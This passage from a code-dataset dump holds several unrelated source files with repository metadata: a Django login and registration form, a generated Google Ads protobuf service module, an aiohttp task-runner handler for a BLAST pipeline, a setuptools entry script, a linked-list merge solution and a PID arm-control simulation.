    ValidationError when they do not match an active user.
    """
    username = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control'}))
    password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'form-control'}))
    def clean(self, *args, **kwargs):
        """Validate credentials via django.contrib.auth.authenticate."""
        username = self.cleaned_data.get('username')
        password = self.cleaned_data.get('password')
        if username and password:
            user = authenticate(username=username, password=password)
            if not user:
                # authenticate() returns None for a bad username OR password,
                # so this message also covers wrong-password attempts.
                raise forms.ValidationError('This user does not exist.')
            # if not user.check_password(password):
            # raise forms.ValidationError('Password is incorrect.')
            if not user.is_active:
                raise forms.ValidationError('This user is no longer active.')
        return super(UserLoginForm, self).clean(*args, **kwargs)
class UserRegisterForm(forms.ModelForm):
    """Registration form that rejects duplicate usernames and e-mail addresses."""
    username = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control'}))
    password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'form-control'}))
    email = forms.EmailField(widget=forms.EmailInput(attrs={'class': 'form-control'}))

    def clean(self, *args, **kwargs):
        """Raise ValidationError when the username or e-mail is already taken."""
        username = self.cleaned_data.get('username')
        email = self.cleaned_data.get('email')
        if username:
            # .exists() tests membership without fetching rows.
            if User.objects.filter(username=username).exists():
                # Message grammar fixed (was "The username is already exists.").
                raise forms.ValidationError('The username already exists.')
        if email:
            if User.objects.filter(email=email).exists():
                raise forms.ValidationError('The email already exists.')
        return super(UserRegisterForm, self).clean(*args, **kwargs)

    class Meta:
        model = User
        fields = [
            'username',
            'password',
            'email'
        ]
|
[
"shawon922@gmail.com"
] |
shawon922@gmail.com
|
4f0ef26fe165b0b46815ad51b62f6a0c0f470256
|
42c48f3178a48b4a2a0aded547770027bf976350
|
/google/ads/google_ads/v5/proto/services/remarketing_action_service_pb2.py
|
0495a4d9e848a5eed492faca8b8aa2397a32544c
|
[
"Apache-2.0"
] |
permissive
|
fiboknacky/google-ads-python
|
e989464a85f28baca1f28d133994c73759e8b4d6
|
a5b6cede64f4d9912ae6ad26927a54e40448c9fe
|
refs/heads/master
| 2021-08-07T20:18:48.618563
| 2020-12-11T09:21:29
| 2020-12-11T09:21:29
| 229,712,514
| 0
| 0
|
Apache-2.0
| 2019-12-23T08:44:49
| 2019-12-23T08:44:49
| null |
UTF-8
|
Python
| false
| true
| 20,741
|
py
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v5/proto/services/remarketing_action_service.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v5.proto.resources import remarketing_action_pb2 as google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.api import client_pb2 as google_dot_api_dot_client__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.protobuf import field_mask_pb2 as google_dot_protobuf_dot_field__mask__pb2
from google.rpc import status_pb2 as google_dot_rpc_dot_status__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v5/proto/services/remarketing_action_service.proto',
package='google.ads.googleads.v5.services',
syntax='proto3',
serialized_options=b'\n$com.google.ads.googleads.v5.servicesB\035RemarketingActionServiceProtoP\001ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v5/services;services\242\002\003GAA\252\002 Google.Ads.GoogleAds.V5.Services\312\002 Google\\Ads\\GoogleAds\\V5\\Services\352\002$Google::Ads::GoogleAds::V5::Services',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nGgoogle/ads/googleads_v5/proto/services/remarketing_action_service.proto\x12 google.ads.googleads.v5.services\x1a@google/ads/googleads_v5/proto/resources/remarketing_action.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x17google/api/client.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a google/protobuf/field_mask.proto\x1a\x17google/rpc/status.proto\"h\n\x1bGetRemarketingActionRequest\x12I\n\rresource_name\x18\x01 \x01(\tB2\xe0\x41\x02\xfa\x41,\n*googleads.googleapis.com/RemarketingAction\"\xc2\x01\n\x1fMutateRemarketingActionsRequest\x12\x18\n\x0b\x63ustomer_id\x18\x01 \x01(\tB\x03\xe0\x41\x02\x12U\n\noperations\x18\x02 \x03(\x0b\x32<.google.ads.googleads.v5.services.RemarketingActionOperationB\x03\xe0\x41\x02\x12\x17\n\x0fpartial_failure\x18\x03 \x01(\x08\x12\x15\n\rvalidate_only\x18\x04 \x01(\x08\"\xea\x01\n\x1aRemarketingActionOperation\x12/\n\x0bupdate_mask\x18\x04 \x01(\x0b\x32\x1a.google.protobuf.FieldMask\x12\x46\n\x06\x63reate\x18\x01 \x01(\x0b\x32\x34.google.ads.googleads.v5.resources.RemarketingActionH\x00\x12\x46\n\x06update\x18\x02 \x01(\x0b\x32\x34.google.ads.googleads.v5.resources.RemarketingActionH\x00\x42\x0b\n\toperation\"\xa7\x01\n MutateRemarketingActionsResponse\x12\x31\n\x15partial_failure_error\x18\x03 \x01(\x0b\x32\x12.google.rpc.Status\x12P\n\x07results\x18\x02 \x03(\x0b\x32?.google.ads.googleads.v5.services.MutateRemarketingActionResult\"6\n\x1dMutateRemarketingActionResult\x12\x15\n\rresource_name\x18\x01 
\x01(\t2\x94\x04\n\x18RemarketingActionService\x12\xd9\x01\n\x14GetRemarketingAction\x12=.google.ads.googleads.v5.services.GetRemarketingActionRequest\x1a\x34.google.ads.googleads.v5.resources.RemarketingAction\"L\x82\xd3\xe4\x93\x02\x36\x12\x34/v5/{resource_name=customers/*/remarketingActions/*}\xda\x41\rresource_name\x12\xfe\x01\n\x18MutateRemarketingActions\x12\x41.google.ads.googleads.v5.services.MutateRemarketingActionsRequest\x1a\x42.google.ads.googleads.v5.services.MutateRemarketingActionsResponse\"[\x82\xd3\xe4\x93\x02<\"7/v5/customers/{customer_id=*}/remarketingActions:mutate:\x01*\xda\x41\x16\x63ustomer_id,operations\x1a\x1b\xca\x41\x18googleads.googleapis.comB\x84\x02\n$com.google.ads.googleads.v5.servicesB\x1dRemarketingActionServiceProtoP\x01ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v5/services;services\xa2\x02\x03GAA\xaa\x02 Google.Ads.GoogleAds.V5.Services\xca\x02 Google\\Ads\\GoogleAds\\V5\\Services\xea\x02$Google::Ads::GoogleAds::V5::Servicesb\x06proto3'
,
dependencies=[google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,google_dot_api_dot_client__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,google_dot_protobuf_dot_field__mask__pb2.DESCRIPTOR,google_dot_rpc_dot_status__pb2.DESCRIPTOR,])
_GETREMARKETINGACTIONREQUEST = _descriptor.Descriptor(
name='GetRemarketingActionRequest',
full_name='google.ads.googleads.v5.services.GetRemarketingActionRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v5.services.GetRemarketingActionRequest.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002\372A,\n*googleads.googleapis.com/RemarketingAction', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=349,
serialized_end=453,
)
_MUTATEREMARKETINGACTIONSREQUEST = _descriptor.Descriptor(
name='MutateRemarketingActionsRequest',
full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='customer_id', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.customer_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='operations', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.operations', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='partial_failure', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.partial_failure', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='validate_only', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.validate_only', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=456,
serialized_end=650,
)
_REMARKETINGACTIONOPERATION = _descriptor.Descriptor(
name='RemarketingActionOperation',
full_name='google.ads.googleads.v5.services.RemarketingActionOperation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='update_mask', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.update_mask', index=0,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='create', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.create', index=1,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='update', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.update', index=2,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='operation', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.operation',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=653,
serialized_end=887,
)
_MUTATEREMARKETINGACTIONSRESPONSE = _descriptor.Descriptor(
name='MutateRemarketingActionsResponse',
full_name='google.ads.googleads.v5.services.MutateRemarketingActionsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='partial_failure_error', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsResponse.partial_failure_error', index=0,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='results', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsResponse.results', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=890,
serialized_end=1057,
)
_MUTATEREMARKETINGACTIONRESULT = _descriptor.Descriptor(
name='MutateRemarketingActionResult',
full_name='google.ads.googleads.v5.services.MutateRemarketingActionResult',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v5.services.MutateRemarketingActionResult.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1059,
serialized_end=1113,
)
_MUTATEREMARKETINGACTIONSREQUEST.fields_by_name['operations'].message_type = _REMARKETINGACTIONOPERATION
_REMARKETINGACTIONOPERATION.fields_by_name['update_mask'].message_type = google_dot_protobuf_dot_field__mask__pb2._FIELDMASK
_REMARKETINGACTIONOPERATION.fields_by_name['create'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2._REMARKETINGACTION
_REMARKETINGACTIONOPERATION.fields_by_name['update'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2._REMARKETINGACTION
_REMARKETINGACTIONOPERATION.oneofs_by_name['operation'].fields.append(
_REMARKETINGACTIONOPERATION.fields_by_name['create'])
_REMARKETINGACTIONOPERATION.fields_by_name['create'].containing_oneof = _REMARKETINGACTIONOPERATION.oneofs_by_name['operation']
_REMARKETINGACTIONOPERATION.oneofs_by_name['operation'].fields.append(
_REMARKETINGACTIONOPERATION.fields_by_name['update'])
_REMARKETINGACTIONOPERATION.fields_by_name['update'].containing_oneof = _REMARKETINGACTIONOPERATION.oneofs_by_name['operation']
_MUTATEREMARKETINGACTIONSRESPONSE.fields_by_name['partial_failure_error'].message_type = google_dot_rpc_dot_status__pb2._STATUS
_MUTATEREMARKETINGACTIONSRESPONSE.fields_by_name['results'].message_type = _MUTATEREMARKETINGACTIONRESULT
DESCRIPTOR.message_types_by_name['GetRemarketingActionRequest'] = _GETREMARKETINGACTIONREQUEST
DESCRIPTOR.message_types_by_name['MutateRemarketingActionsRequest'] = _MUTATEREMARKETINGACTIONSREQUEST
DESCRIPTOR.message_types_by_name['RemarketingActionOperation'] = _REMARKETINGACTIONOPERATION
DESCRIPTOR.message_types_by_name['MutateRemarketingActionsResponse'] = _MUTATEREMARKETINGACTIONSRESPONSE
DESCRIPTOR.message_types_by_name['MutateRemarketingActionResult'] = _MUTATEREMARKETINGACTIONRESULT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GetRemarketingActionRequest = _reflection.GeneratedProtocolMessageType('GetRemarketingActionRequest', (_message.Message,), {
'DESCRIPTOR' : _GETREMARKETINGACTIONREQUEST,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """Request message for [RemarketingActionService.GetRemarketingAction][go
ogle.ads.googleads.v5.services.RemarketingActionService.GetRemarketing
Action].
Attributes:
resource_name:
Required. The resource name of the remarketing action to
fetch.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.GetRemarketingActionRequest)
})
_sym_db.RegisterMessage(GetRemarketingActionRequest)
MutateRemarketingActionsRequest = _reflection.GeneratedProtocolMessageType('MutateRemarketingActionsRequest', (_message.Message,), {
'DESCRIPTOR' : _MUTATEREMARKETINGACTIONSREQUEST,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """Request message for [RemarketingActionService.MutateRemarketingActions
][google.ads.googleads.v5.services.RemarketingActionService.MutateRema
rketingActions].
Attributes:
customer_id:
Required. The ID of the customer whose remarketing actions are
being modified.
operations:
Required. The list of operations to perform on individual
remarketing actions.
partial_failure:
If true, successful operations will be carried out and invalid
operations will return errors. If false, all operations will
be carried out in one transaction if and only if they are all
valid. Default is false.
validate_only:
If true, the request is validated but not executed. Only
errors are returned, not results.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.MutateRemarketingActionsRequest)
})
_sym_db.RegisterMessage(MutateRemarketingActionsRequest)
RemarketingActionOperation = _reflection.GeneratedProtocolMessageType('RemarketingActionOperation', (_message.Message,), {
'DESCRIPTOR' : _REMARKETINGACTIONOPERATION,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """A single operation (create, update) on a remarketing action.
Attributes:
update_mask:
FieldMask that determines which resource fields are modified
in an update.
operation:
The mutate operation.
create:
Create operation: No resource name is expected for the new
remarketing action.
update:
Update operation: The remarketing action is expected to have a
valid resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.RemarketingActionOperation)
})
_sym_db.RegisterMessage(RemarketingActionOperation)
MutateRemarketingActionsResponse = _reflection.GeneratedProtocolMessageType('MutateRemarketingActionsResponse', (_message.Message,), {
'DESCRIPTOR' : _MUTATEREMARKETINGACTIONSRESPONSE,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """Response message for remarketing action mutate.
Attributes:
partial_failure_error:
Errors that pertain to operation failures in the partial
failure mode. Returned only when partial\_failure = true and
all errors occur inside the operations. If any errors occur
outside the operations (e.g. auth errors), we return an RPC
level error.
results:
All results for the mutate.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.MutateRemarketingActionsResponse)
})
_sym_db.RegisterMessage(MutateRemarketingActionsResponse)
MutateRemarketingActionResult = _reflection.GeneratedProtocolMessageType('MutateRemarketingActionResult', (_message.Message,), {
'DESCRIPTOR' : _MUTATEREMARKETINGACTIONRESULT,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """The result for the remarketing action mutate.
Attributes:
resource_name:
Returned for successful operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.MutateRemarketingActionResult)
})
_sym_db.RegisterMessage(MutateRemarketingActionResult)
DESCRIPTOR._options = None
_GETREMARKETINGACTIONREQUEST.fields_by_name['resource_name']._options = None
_MUTATEREMARKETINGACTIONSREQUEST.fields_by_name['customer_id']._options = None
_MUTATEREMARKETINGACTIONSREQUEST.fields_by_name['operations']._options = None
_REMARKETINGACTIONSERVICE = _descriptor.ServiceDescriptor(
name='RemarketingActionService',
full_name='google.ads.googleads.v5.services.RemarketingActionService',
file=DESCRIPTOR,
index=0,
serialized_options=b'\312A\030googleads.googleapis.com',
create_key=_descriptor._internal_create_key,
serialized_start=1116,
serialized_end=1648,
methods=[
_descriptor.MethodDescriptor(
name='GetRemarketingAction',
full_name='google.ads.googleads.v5.services.RemarketingActionService.GetRemarketingAction',
index=0,
containing_service=None,
input_type=_GETREMARKETINGACTIONREQUEST,
output_type=google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2._REMARKETINGACTION,
serialized_options=b'\202\323\344\223\0026\0224/v5/{resource_name=customers/*/remarketingActions/*}\332A\rresource_name',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='MutateRemarketingActions',
full_name='google.ads.googleads.v5.services.RemarketingActionService.MutateRemarketingActions',
index=1,
containing_service=None,
input_type=_MUTATEREMARKETINGACTIONSREQUEST,
output_type=_MUTATEREMARKETINGACTIONSRESPONSE,
serialized_options=b'\202\323\344\223\002<\"7/v5/customers/{customer_id=*}/remarketingActions:mutate:\001*\332A\026customer_id,operations',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_REMARKETINGACTIONSERVICE)
DESCRIPTOR.services_by_name['RemarketingActionService'] = _REMARKETINGACTIONSERVICE
# @@protoc_insertion_point(module_scope)
|
[
"noreply@github.com"
] |
noreply@github.com
|
440bc6380c64d0077b43e4244a63a7156658043d
|
7e68f74b2443836b6da61b0648ac2d9541b70fc8
|
/myapp/urlhandler.py
|
48fb10ccadecbf2e40464bb8ce0a5d542eff4b53
|
[] |
no_license
|
binhnq94/wrapper
|
50fc54464f187461699289f85c8b8b44811e09e5
|
07a3086b833d40416a8ae2e4342bddaa5ba622d7
|
refs/heads/master
| 2021-07-29T07:55:40.325110
| 2015-09-18T18:02:21
| 2015-09-18T18:02:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,735
|
py
|
__author__ = 'techbk'
import asyncio
from aiohttp import web
from runprocess import run_process
from runshell import runshell
class Url_handler:
    """aiohttp request handlers that launch background tasks and let
    clients poll for their results.

    Each started task gets a monotonically increasing numeric id and is
    stored in ``self._task``; ``check_result`` looks tasks up by that id.
    """

    def __init__(self, loop):
        self._loop = loop
        self._task = {}    # task id (str) -> asyncio.Task
        self._taskid = 0   # last id handed out

    def __setid(self):
        # Allocate and return the next task id as a string.
        self._taskid = self._taskid + 1
        return str(self._taskid)

    # NOTE: the original used ``@asyncio.coroutine`` generator coroutines and
    # ``asyncio.async(...)``.  ``async`` became a reserved word in Python 3.7
    # (making the original a SyntaxError there) and ``asyncio.coroutine`` was
    # removed in 3.11; ``async def`` / ``asyncio.ensure_future`` are the
    # documented, behaviorally equivalent replacements.
    async def doblastn(self, request):
        """Start a blastdbcmd/blastn shell pipeline in the background and
        return a response containing the URL to poll for the result."""
        cmd = (u"blastdbcmd -db /db/refseq_rna.00 -entry nm_000122 -out test_query.fa"
               "&& blastn -query test_query.fa -db /db/refseq_rna.00 -task blastn -dust no -outfmt "
               "'7 qseqid sseqid evalue bitscore' -max_target_seqs 2")
        task_run_process = asyncio.ensure_future(runshell(cmd))
        id = self.__setid()
        text = "Do Start App: http://localhost:8080/checkresult/" + id
        self._task[id] = task_run_process
        return web.Response(body=text.encode('utf-8'))

    async def do_start_app1(self, request):
        """Start the demo ``run_process`` task and return its poll URL."""
        task_run_process = asyncio.ensure_future(run_process(10))
        # Reuse the id allocator instead of duplicating the increment logic.
        id = self.__setid()
        text = "Do Start App: http://localhost:8080/checkresult/" + id
        self._task[id] = task_run_process
        return web.Response(body=text.encode('utf-8'))

    async def check_result(self, request):
        """Report the status/output of the task whose id is in the URL.

        Response bodies are byte-identical to the original implementation
        (some are Vietnamese: "App ko ton tai" = app does not exist,
        "Link cua ban ko ton tai" = your link does not exist).
        """
        id = request.match_info.get('id')
        if id:
            task_run_process = self._task.get(id, False)
            if task_run_process:
                if task_run_process.done():
                    print(task_run_process.done())
                    # Task is done, so awaiting returns immediately with the
                    # (stdout, stderr) pair produced by the subprocess helper.
                    result = await task_run_process
                    print(result)
                    text = "App " + id + " done!"
                    if result[1]:
                        text += "\nError: " + result[1].decode('ascii')
                    if result[0]:
                        text += "\nOutput: \n" + result[0].decode('ascii')
                    return web.Response(body=text.encode('utf-8'))
                else:
                    text = "App Not Done"
                    return web.Response(body=text.encode('utf-8'))
            else:
                text = "App ko ton tai"
                return web.Response(body=text.encode('utf-8'))
        else:
            text = "Link cua ban ko ton tai"
            return web.Response(body=text.encode('utf-8'))
|
[
"quangbinh.nguyentrong@gmail.com"
] |
quangbinh.nguyentrong@gmail.com
|
f1d726839edcc9efa6b64627090b6a4e14244fbf
|
00b1649b7467d4525473c3c90622e2bd591650e3
|
/venv/Scripts/easy_install-script.py
|
0065118b457aa1c6462614cb3164c965464201fe
|
[] |
no_license
|
fndalemao/Wolf
|
eca40b0edf20580e6622429792f356d8c676218c
|
0ba2cd50822b9d21d0a63fbd473f357f4a916786
|
refs/heads/master
| 2020-05-07T16:59:48.394189
| 2019-04-12T03:04:22
| 2019-04-12T03:04:22
| 180,708,760
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 450
|
py
|
#!C:\Users\fndal\Documents\Projetos\Wolf\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Strip the "-script.py(w)"/".exe" suffix so argv[0] names the command itself.
    cleaned_argv0 = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.argv[0] = cleaned_argv0
    entry_point = load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')
    sys.exit(entry_point())
|
[
"fnd.alemao02@gmail.com"
] |
fnd.alemao02@gmail.com
|
b67dcec5e71c0c499e230631f879a42c550ff8a1
|
c413157aea112a7f5f4305b74b3d0b78a11036d6
|
/LeetCode/MergeTwoSortedLinkedList.py
|
fb060eae712584e5398461f63bfaac26bdd1d2f2
|
[] |
no_license
|
jatinkhurana30/Tier1_Organizations_Interview_CodingProblems
|
3148e5518f4bba9a38325a95a6b9784f105ae20b
|
f4eb3ff00358d50d3f473c2947ba8d3c747f379e
|
refs/heads/master
| 2021-05-25T08:56:37.931955
| 2020-06-14T08:52:03
| 2020-06-14T08:52:03
| 253,750,583
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,705
|
py
|
"""Merge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.
Example:
Input: 1->2->4, 1->3->4
Output: 1->1->2->3->4->4"""
class ListNode:
    """Node of a singly linked list.

    Attributes:
        val: Payload stored in the node (defaults to 0).
        next: Following node, or None at the end of the list.
    """
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next

    def __repr__(self):
        # Aid debugging: the original class printed only the default object repr.
        return "ListNode({!r})".format(self.val)
class Solution:
    """LeetCode 21: merge two sorted singly linked lists into a new sorted list."""

    def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:
        """Return the head of a new sorted list containing all values of l1 and l2.

        Like the original implementation, fresh nodes are allocated (values are
        copied; the input lists are not spliced or mutated).  Returns None when
        both inputs are empty.
        """
        # Dummy head removes the "is this the first node?" special case that the
        # original code repeated three times.
        dummy = ListNode()
        tail = dummy
        while l1 is not None and l2 is not None:
            if l1.val <= l2.val:          # <= keeps the merge stable, as before
                tail.next = ListNode(l1.val)
                l1 = l1.next
            else:
                tail.next = ListNode(l2.val)
                l2 = l2.next
            tail = tail.next
        # At most one list still has nodes; copy the remainder verbatim.
        remainder = l1 if l1 is not None else l2
        while remainder is not None:
            tail.next = ListNode(remainder.val)
            tail = tail.next
            remainder = remainder.next
        return dummy.next

    def addToFinalList(self, node_val, finalList, final_list_counter):
        """Append node_val to (finalList, tail) and return the updated pair.

        Legacy helper kept for interface compatibility; mergeTwoLists no longer
        needs it.
        """
        if finalList is None:
            finalList = ListNode(node_val)
            final_list_counter = finalList
        else:
            final_list_counter.next = ListNode(node_val)
            final_list_counter = final_list_counter.next
        return finalList, final_list_counter
|
[
"!Proalcatraz30"
] |
!Proalcatraz30
|
454b1388878b271229ad8a51b0c3b7dd10484f86
|
e524a24ed3021ec8e2cc97e3a38ff21cd9a32b2e
|
/python/simulation/arm_control.py
|
d5f1ba0504492aadf8b939366b2e4451b3555772
|
[] |
no_license
|
psr2016/psr
|
161f9208bbaba0e8ac8c8b3a6bd3afca1303e511
|
386b5461619a013313ca8b11ed6d20948ca1885c
|
refs/heads/master
| 2020-04-07T01:43:54.044099
| 2018-06-11T14:26:56
| 2018-06-11T14:26:56
| 57,581,925
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 836
|
py
|
#
# arm_control.py
#
import pylab
import math
from systems import *
from inputs import *
from controllers import *
# --- Simulation setup ---
delta_t = 0.001 # sampling period: 1 ms
durata_simulazione = 20 # total simulated time, seconds
numero_punti = int(durata_simulazione / delta_t)  # number of simulation steps
# Plant and controller come from the project's systems/controllers modules
# (wildcard-imported above); constructor argument meanings are defined there.
the_arm = RoboticArm(6, 5.0)
controller = PID_Controller(100, 80, 50)
target_theta = math.radians(10)  # setpoint: 10 degrees, converted to radians
current_theta = 0  # measured arm angle fed back to the controller
# Histories collected for plotting.
times = []
position = []
target = []
for k in range(0, numero_punti):
    controller_output = controller.evaluate(target_theta, current_theta, delta_t)
    the_arm.evaluate(controller_output, delta_t)
    times.append(k * delta_t)
    # NOTE: current_theta is logged *before* being refreshed below, so each
    # sample records the angle at the start of the step; the statement order
    # is load-bearing -- do not reorder.
    position.append(current_theta)
    target.append(target_theta)
    current_theta = the_arm.get_theta()
# Plot measured position (blue) against the constant setpoint (red).
pylab.figure()
pylab.plot(times, position, 'b-+')
pylab.plot(times, target, 'r-+')
pylab.title("Posizione")
pylab.show()
|
[
"santoro@dmi.unict.it"
] |
santoro@dmi.unict.it
|
a39f0bac82f84873a6dbf8cfd3f6a437ad45d06c
|
045cb1a5638c3575296f83471758dc09a8065725
|
/addons/stock_account/wizard/stock_picking_return.py
|
5d54d201e6b6a357cd694038a75f20b33ff45cc4
|
[] |
no_license
|
marionumza/saas
|
7236842b0db98d1a0d0c3c88df32d268509629cb
|
148dd95d991a348ebbaff9396759a7dd1fe6e101
|
refs/heads/main
| 2023-03-27T14:08:57.121601
| 2021-03-20T07:59:08
| 2021-03-20T07:59:08
| null | 0
| 0
